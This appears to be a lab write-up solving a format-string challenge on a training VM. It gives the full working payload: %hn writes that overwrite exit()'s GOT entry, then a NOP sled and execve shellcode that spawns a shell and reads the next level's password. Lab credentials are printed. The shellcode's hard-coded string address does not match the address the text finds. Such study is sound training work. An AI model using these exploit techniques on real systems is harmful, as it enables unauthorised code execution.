Lab4B Write-up (Medium)
First, log into the Lab04 as Lab4B (lab4B:bu7_1t_w4sn7_brUt3_f0rc34b1e!
) and go to the challenges folder:
$ ssh lab4B@<VM_IP>
$ cd /levels/lab04/
Let’s execute the program:
lab4B@warzone:/levels/lab04$ ./lab4B
TEST
test
Okay, so it seems that this executable simply convert what we type and return it in lower case to the standard output.
Source Code Analysis
Let’s take a look at the source:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
int i = 0;
char buf[100];
/* read user input securely */
fgets(buf, 100, stdin);
/* convert string to lowercase */
for (i = 0; i < strlen(buf); i++)
if (buf[i] >= 'A' && buf[i] <= 'Z')
buf[i] = buf[i] ^ 0x20;
/* print out our nice and new lowercase string */
printf(buf);
exit(EXIT_SUCCESS);
return EXIT_FAILURE;
}
Here, the vulnerability is, once again, located in the printf() function where no format specifiers are set. Let’s check that assumption:
lab4B@warzone:/levels/lab04$ ./lab4B
%08x
00000064
Perfect. Now, we need to find a way to exploit this vulnerability. One way to do that would be to overwrite the address of exit() with the address of our shellcode. Why? Simply, because after calling printf(), the next function to be called is exit().
The address of exit() is stored in the GOT. The Global Offset Table (or GOT) contains direct access to the absolute address of a symbol. As the GOT is writable, we could overwrite the exit() address with the address of our choice to redirect the execution flow.
First we have to find the offset of exit() in the GOT:
lab4B@warzone:/levels/lab04$ readelf --relocs lab4B
Relocation section '.rel.dyn' at offset 0x4bc contains 2 entries:
Offset Info Type Sym.Value Sym. Name
0804999c 00000406 R_386_GLOB_DAT 00000000 __gmon_start__
080499cc 00001005 R_386_COPY 080499cc stdin
Relocation section '.rel.plt' at offset 0x4cc contains 6 entries:
Offset Info Type Sym.Value Sym. Name
080499ac 00000207 R_386_JUMP_SLOT 00000000 printf
080499b0 00000307 R_386_JUMP_SLOT 00000000 fgets
080499b4 00000407 R_386_JUMP_SLOT 00000000 __gmon_start__
080499b8 00000507 R_386_JUMP_SLOT 00000000 exit
080499bc 00000607 R_386_JUMP_SLOT 00000000 strlen
080499c0 00000707 R_386_JUMP_SLOT 00000000 __libc_start_main
Here, the address of exit() is 080499b8
. Then, we have to find the offset of our input string:
lab4B@warzone:/levels/lab04$ ./lab4B
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
aaaa00000064.b7fcdc20.00000000.bffff6e4.bffff658.61616161.78383025.3830252e
lab4B@warzone:/levels/lab04$ ./lab4B
AAAA%6$p
aaaa0x61616161
So, our string is the 6th parameter on the stack. But, why do we need this information? Well, that’s because we’ll use another interesting format specifier: %n.
The %n specifier will write the size of our input at the address pointed by %n. For example, the following input : AAAA%n, means that we will write the value 4 (because the size of “AAAA” equals 4 bytes) at the address pointed by %n. But, where on the stack %n points to?
Well, let’s try to submit AAAA%n into the program :
$ ./lab4B
AAAA%n
Segmentation fault (core dumped)
Okay, so the program just segfault. Let’s check where we tried to write 4 with the %p specifier:
$ ./lab4B
AAAA%p
aaaa0x64
As you can see, 0x64 is not a valid address, that’s why it can’t write here.
So, instead of using a simple %n, we can use %<num>$n
to specify the address to write to. What would happen if %<num>$n
points to the beginning of our string? Well, it will use the address specified in the beginning of our strings to write data to. It means that instead of using AAAA, we’ll use a valid address, in this case it will be the address of exit().
Let’s try to overwrite the exit() address. In the following dump, I’ll put a breakpoint right before the exit() call, then I’ll send the payload.
$ gdb ./lab4B
Reading symbols from ./lab4B...(no debugging symbols found)...done.
gdb-peda$ break *main+156 ; Break before exit()
Breakpoint 1 at 0x8048729
gdb-peda$ x/x 0x080499b8 ; Original exit() address
0x80499b8 <exit@got.plt>: 0x08048566
gdb-peda$ r < <(python -c 'print("\xb8\x99\x04\x08" + "%6$n")')
Starting program: /levels/lab04/lab4B < <(python -c 'print("\xb8\x99\x04\x08" + "%6$n")')
��
[----------------------------------registers-----------------------------------]
EAX: 0x5
EBX: 0x9 ('\t')
ECX: 0x0
EDX: 0xb7fce898 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6c8 --> 0x0
ESP: 0xbffff640 --> 0xbffff658 --> 0x80499b8 --> 0x4
EIP: 0x8048729 (<main+156>: mov DWORD PTR [esp],0x0)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804871d <main+144>: lea eax,[esp+0x18]
0x8048721 <main+148>: mov DWORD PTR [esp],eax
0x8048724 <main+151>: call 0x8048530 <printf@plt>
=> 0x8048729 <main+156>: mov DWORD PTR [esp],0x0
0x8048730 <main+163>: call 0x8048560 <exit@plt>
0x8048735: xchg ax,ax
0x8048737: xchg ax,ax
0x8048739: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0xbffff658 --> 0x80499b8 --> 0x4
0004| 0xbffff644 --> 0x64 ('d')
0008| 0xbffff648 --> 0xb7fcdc20 --> 0xfbad2088
0012| 0xbffff64c --> 0x0
0016| 0xbffff650 --> 0xbffff704 --> 0x27f77235
0020| 0xbffff654 --> 0xbffff678 --> 0xb7e2fbf8 --> 0x2aa0
0024| 0xbffff658 --> 0x80499b8 --> 0x4
0028| 0xbffff65c ("%6$n\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048729 in main ()
gdb-peda$ x/x 0x080499b8
0x80499b8 <exit@got.plt>: 0x04 ; Overwrite!
As you can see, we overwrote the original address with 0x04 (which is the size of the address). Awesome, it seems that we can alter the GOT. Here, we could use a small shellcode and overwrite the exit() address with a stack address. I was thinking about something like this:
[address of exit() in GOT][magic sauce to rewrite the GOT][NOP + Shellcode]
Let’s switch to gdb
.
Dynamic Analysis
First, let’s see where our shellcode will be in memory. Here, I put a breakpoint on main+163
as it is the call to exit().
lab4B@warzone:/levels/lab04$ gdb -q ./lab4B
Reading symbols from ./lab4B...(no debugging symbols found)...done.
gdb-peda$ break *main+163
Breakpoint 1 at 0x8048730
gdb-peda$ r < <(python -c 'print("\x90" * 50)')
Starting program: /levels/lab04/lab4B < <(python -c 'print("\x90" * 50)')
��������������������������������������������������
[----------------------------------registers-----------------------------------]
EAX: 0x33 ('3')
EBX: 0x33 ('3')
ECX: 0x0
EDX: 0xb7fce898 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xbffff6b8 --> 0x0
ESP: 0xbffff630 --> 0x0
EIP: 0x8048730 (<main+163>: call 0x8048560 <exit@plt>)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048721 <main+148>: mov DWORD PTR [esp],eax
0x8048724 <main+151>: call 0x8048530 <printf@plt>
0x8048729 <main+156>: mov DWORD PTR [esp],0x0
=> 0x8048730 <main+163>: call 0x8048560 <exit@plt>
0x8048735: xchg ax,ax
0x8048737: xchg ax,ax
0x8048739: xchg ax,ax
0x804873b: xchg ax,ax
Guessed arguments:
arg[0]: 0x0
[------------------------------------stack-------------------------------------]
0000| 0xbffff630 --> 0x0
0004| 0xbffff634 --> 0x64 ('d')
0008| 0xbffff638 --> 0xb7fcdc20 --> 0xfbad2088
0012| 0xbffff63c --> 0x0
0016| 0xbffff640 --> 0xbffff6f4 (" +d<0/\035\004")
0020| 0xbffff644 --> 0xbffff668 --> 0x90909090
0024| 0xbffff648 --> 0x90909090
0028| 0xbffff64c --> 0x90909090
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048730 in main ()
gdb-peda$ x/64x $esp
0xbffff630: 0x00000000 0x00000064 0xb7fcdc20 0x00000000
0xbffff640: 0xbffff6f4 0xbffff668 0x90909090 0x90909090
0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff660: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff670: 0x90909090 0x90909090 0x000a9090 0x08048505
0xbffff680: 0xbffff887 0x0000002f 0x080499a0 0x08048792
0xbffff690: 0x00000001 0xbffff754 0xbffff75c 0xb7e5642d
0xbffff6a0: 0xb7fcd3c4 0xb7fff000 0x0804874b 0x00000033
Here, if we leave some space to rewrite the GOT, 0xbffff670
would be a good candidate to place our NOP-sled and shellcode. As we saw earlier, we replaced the exit() function address (at 0x080499b8
) by 0x04, but we don’t want to write 4, we want to write 0xbffff670 (the stack pointer to our NOP sled).
However, we got an issue, if writing 4 bytes as input means writing “4” at a specific address. Well, you’ll have to write 3221223024 (0xbffff670 in decimal) chars to write 0xbffff670… impossible! Why? Let me show you.
There is a little trick to write the value we want:
\xb8\x99\x04\x08%<value-4>x%6$n
(it’s value-4 because we already wrote 4 bytes,\xb8\x99\x04\x08
)
For example, \xb8\x99\x04\x08%96x%6$n
will write the value 100 at the address 0x080499b8.
However, because %96x
will print your argument padded with 100 bytes (FYI, it pads with “space”), it will take forever to write 3221223024 chars. Let’s see that in memory (don’t forget to place a breakpoint on exit()).
gdb-peda$ r < <(python -c 'print("\xb8\x99\x04\x08" + "%96x%6$n")')
Starting program: /levels/lab04/lab4B < <(python -c 'print("\xb8\x99\x04\x08" + "%96x%6$n")')
� 64 # See the padding ?
...[snip]...
Legend: code, data, rodata, value
Breakpoint 1, 0x08048730 in main ()
gdb-peda$ x/x 0x080499b8
0x80499b8 <exit@got.plt>: 0x64 # 100 in decimal
Watch Out! It’s %<Y>x
NOT %<Y>$x
. The first one will pad the 1st argument with Y bytes. However, the second one will print the Yth argument.
So, instead of writing a long integer (4 bytes), we’ll write 2 short integers (2 bytes). To do that, we’ll use another specifier: %hn (here, the h
means short integer).
Let’s break this down:
- We want to write 0xbffff670. It means, 0xbfff (49151 in decimal) in the high order bytes and 0xf670 (63088 in decimal) in the low order bytes.
- We want to write those value at 0x080499b8. It means writing 0xbfff at 0x080499b8 + 2 = 0x080499ba (high order) and 0xf670 at 0x080499b8 (low order).
Now, we have to figure out the value to set for the padding. Here is the formula:
[The value we want] - [The bytes already wrote] = [The value to set].
Let’s start with the high order bytes:
It will be 49151 - 8 = 49143, because we will already write 8 bytes (the two 4 bytes addresses).
Then, the low order bytes:
It’ll will be 63088 - 49151 = 13937, because we already wrote 49151 bytes (the two 4 bytes addresses and 49143 bytes from the previous writing).
Now we can construct the exploit:
It’ll be: "\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13937x" + "%7$hn"
. Let me explain:
\xba\x99\x04\x08
or 0x080499ba (in reverse order) points to the high order bytes.\xb8\x99\x04\x08
or 0x080499b8 (in reverse order) points to the low order bytes.%49143x
will write 49143 bytes on the standard output.%6$hn
will write these bytes at the first address specified (0x080499ba).%13937x
will write 13937 bytes on the standard output.%7$hn
will write these bytes at the second address specified (0x080499b8).
Let’s try that in gdb
. Again, don’t forget to set a breakpoint on the exit() call.
gdb-peda$ break *main+163
Breakpoint 1 at 0x8048730
gdb-peda$ x/x 0x080499b8
0x80499b8 <exit@got.plt>: 0x08048566
gdb-peda$ r < <(python -c 'print("\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13937x" + "%7$hn")')
Starting program: /levels/lab04/lab4B < <(python -c 'print("\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13937x" + "%7$hn")')
��
...[snip]...
Breakpoint 1, 0x08048730 in main ()
gdb-peda$ x/x 0x080499b8
0x80499b8 <exit@got.plt>: 0xbffff670
Awesome, the orginal exit() address (0x08048566
) has been replaced by 0xbffff670
. Now, the idea would be to place a NOP-sled and a shellcode right after our format string exploit given the new address point right after the first part of the exploit.
Let’s write this shellcode.
Shellcode
Remember, we have a small constraint here, the shellcode can’t contain bytes between 0x41 (A) and 0x5A (Z) as the code will convert them to the lower string version of the ASCII letters. Let’s do a quick rewrite of one of our previous shellcode to avoid the badchars. Here is the original version:
global _start
_start:
xor eax, eax ; EAX = 0
push eax ; push our null byte on the stack to end the string
; push "/bin//sh" in reverse order
push 0x68732f2f ; "hs//"
push 0x6e69622f ; "nib/"
; execve("/bin//sh/", 0, 0);
mov ebx, esp ; EBX = ptr to "/bin//sh"
mov ecx, eax ; ECX = 0
mov edx, eax ; EDX = 0
mov al, 0xb ; sys_execve()
int 0x80
Note The Warzone VM doesn’t have NASM installed, so I did the development on another Linux VM.
$ nano shellcode.asm
$ nasm -f elf32 shellcode.asm
Then, we can check the code and generate the shellcode.
$ objdump -M intel -d shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor eax,eax
2: 50 push eax ; 50 = "P" - it will break the code
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 89 c1 mov ecx,eax
11: 89 c2 mov edx,eax
13: b0 0b mov al,0xb
15: cd 80 int 0x80
Here, the push eax
will cause an issue as it will be 0x50 in machine code. To bypass this issue, let’s see if we can find a reference to /bin/bash
in memory to gain some space and remove the push eax
instruction.
lab4B@warzone:/levels/lab04$ gdb -q ./lab4B
Reading symbols from ./lab4B...(no debugging symbols found)...done.
gdb-peda$ break main
Breakpoint 1 at 0x8048691
gdb-peda$ run
Starting program: /levels/lab04/lab4B
...[snip]...
Breakpoint 1, 0x08048691 in main ()
gdb-peda$ searchmem "/bin/bash"
Searching for '/bin/bash' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0xbffff8b4 ("/bin/bash")
We do have a reference of /bin/bash at the 0xbffff8b4
address. Now, we can write an alternative version of this shellcode.
global _start
_start:
xor eax,eax ; EAX = 0
mov ebx, 0xb7f83a24 ; pointer to '/bin/bash'
mov ecx, ecx
mov edx, ecx
mov al, 0xb
int 0x80
Assemble the code:
$ nano shellcode.asm
$ nasm -f elf32 shellcode.asm
Then, let’s check the result.
$ objdump -M intel -d shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor eax,eax
2: bb 24 3a f8 b7 mov ebx,0xb7f83a24
7: 89 c9 mov ecx,ecx
9: 89 ca mov edx,ecx
b: b0 0b mov al,0xb
d: cd 80 int 0x80
Awesome, no badchars. Here is our little shellcode:
\x31\xc0\xbb\x24\x3a\xf8\xb7\x89\xc9\x89\xca\xb0\x0b\xcd\x80
If we add a NOP-sled and our shellcode right after the first part of the exploit, we should get a shell.
gdb-peda$ r < <(python -c 'print("\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13937x" + "%7$hn" + 32 * "\x90" + "\x31\xc0\xbb\x24\x3a\xf8\xb7\x89\xc9\x89\xca\xb0\x0b\xcd\x80")')
Starting program: /levels/lab04/lab4B < <(python -c 'print("\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13937x" + "%7$hn" + 32 * "\x90" + "\x31\xc0\xbb\x24\x3a\xf8\xb7\x89\xc9\x89\xca\xb0\x0b\xcd\x80")')
��
...[snip]...
process 2775 is executing new program: /bin/dash
[Inferior 1 (process 2775) exited normally]
Warning: not running or target is remote
The exploit seems to be working inside gdb
. However, like in the previous levels, we may need to adjust the return address.
Solution
There is a quick trick to easily find the difference between the stack address inside and outside gdb
. In gdb
, our return address was 0xbffff670
. Now, if you set a breakpoint on exit() and check the stack, you will see that we can leak an address.
gdb-peda$ break *main+163
Breakpoint 1 at 0x8048730
gdb-peda$ run
Starting program: /levels/lab04/lab4B
AAAA
aaaa
Breakpoint 1, 0x08048730 in main ()
gdb-peda$ x/16x $esp
0xbffff630: 0x00000000 0x00000064 0xb7fcdc20 0x00000000
0xbffff640: 0xbffff6f4 0xbffff668 0x61616161 0x0804000a
0xbffff650: 0xb7fff938 0x00000000 0x000000c2 0xb7eb8216
0xbffff660: 0xffffffff 0xbffff68e 0xb7e2fbf8 0xb7e56273
See the 0xbffff668
value at 0xbffff644
? It is not too far from 0xbffff670
(return address). Let’s check this address outside gdb
with the format string exploit.
lab4B@warzone:/levels/lab04$ ./lab4B
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
aaaa00000064.b7fcdc20.00000000.bffff6b4.bffff628.61616161.78383025.3830252e
The 0xbffff668
is now 0xbffff628
. It means we have 40 bytes of difference. So, to fix our exploit we just need to subtract 40 to 13937 which is equal to 13897. Let’s see if it’s working.
lab4B@warzone:/levels/lab04$ (python -c 'print("\xba\x99\x04\x08" + "\xb8\x99\x04\x08" + "%49143x" + "%6$hn" + "%13897x" + "%7$hn" + 32 * "\x90" + "\x31\xc0\xbb\x24\x3a\xf8\xb7\x89\xc9\x89\xca\xb0\x0b\xcd\x80")'; cat) | ./lab4B
...[snip]...
whoami
lab4A
cat /home/lab4A/.pass
fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3
Easy right? You can go to the last challenge of this level.